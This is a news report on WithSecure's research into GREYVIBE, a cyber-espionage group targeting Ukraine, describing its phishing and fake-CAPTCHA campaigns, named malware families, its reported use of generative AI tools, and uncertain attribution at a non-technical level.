A newly identified cyber espionage group known as GREYVIBE has been linked to sustained and evolving cyberattacks targeting Ukraine and related entities, with researchers reporting the group has begun incorporating artificial intelligence tools into its operations to enhance malware development and campaign execution.
According to cybersecurity firm WithSecure, GREYVIBE has been active since at least August 2025 and is believed to be a Russian-speaking threat actor operating in alignment with broader geopolitical interests tied to the ongoing conflict in Ukraine.
Multiple Attack Vectors Used in Campaigns
Researchers say GREYVIBE has deployed a wide range of delivery techniques to compromise victims across military, government, business, and civilian sectors. These include:
- Spear-phishing emails carrying malicious attachments or links
- Fake CAPTCHA and verification pages designed to trigger malware execution
- Fraudulent websites impersonating Ukrainian organizations and services
- Mobile-focused malware campaigns targeting Android devices
Once inside a system, the group reportedly uses custom-built malware families and loaders designed to maintain persistence and enable remote access.
Malware Families and Intrusion Chains
The group’s operations involve multiple attack chains, each tailored to different delivery methods and platforms.
One campaign, known as PhantomMail, uses phishing emails to distribute compressed files hosted on cloud platforms. These archives contain JavaScript-based loaders that deploy decoy documents while silently installing malware such as PhantomRelay, a PowerShell-based remote access tool.
Another chain, PhantomClick, relies on fake CAPTCHA pages that trick users into executing commands that initiate infections. Meanwhile, PrincessClub operations use fraudulent adult-themed websites targeting Ukrainian users with spyware for Android and remote access tools for Windows systems.
Additional campaigns, including DroneLink and Nebo, use impersonation tactics ranging from charity fronts to fake login pages designed to harvest credentials or deploy spyware.
AI Tools Used to Enhance Cyber Operations
Security analysts say GREYVIBE has reportedly incorporated generative AI tools, including large language models, to assist with malware development, obfuscation, infrastructure setup, and phishing content creation.
Researchers believe AI is helping the group:
- Speed up malware development cycles
- Generate phishing lures and fake websites
- Refactor or modify malicious code to avoid detection
- Reduce reliance on publicly traceable tooling
However, investigators also noted that AI-generated components introduced inconsistencies and design flaws in some malware samples, suggesting a mixed level of operational maturity.
Hybrid Cybercrime-State Connection Under Investigation
WithSecure assesses GREYVIBE as a low-to-moderately sophisticated group with possible links to both state-aligned objectives and the broader Russian cybercriminal ecosystem.
Evidence cited by researchers includes:
- Use of tools associated with known cybercrime groups
- Overlap of malware variants across unrelated campaigns
- Early-stage malware samples uploaded to public analysis platforms
- Informal naming conventions and development artifacts
- Occasional deployment of cryptocurrency mining software
These factors suggest a hybrid structure where individuals with cybercriminal backgrounds may be operating alongside or in support of state-directed objectives.
Attribution Remains Uncertain
While GREYVIBE’s activity aligns with Russian strategic interests, researchers caution that the group does not fit neatly into traditional categories of either nation-state or cybercriminal operations.
Instead, it appears to operate in a “grey zone,” blending espionage-driven objectives with tools and methods commonly seen in financially motivated cybercrime.
Conclusion
The emergence of GREYVIBE highlights a growing trend in modern cyber warfare: the convergence of artificial intelligence and hybrid threat actors. As AI tools become more accessible, researchers warn that both state-linked and criminal groups may increasingly rely on them to scale attacks, reduce development time, and complicate attribution efforts.
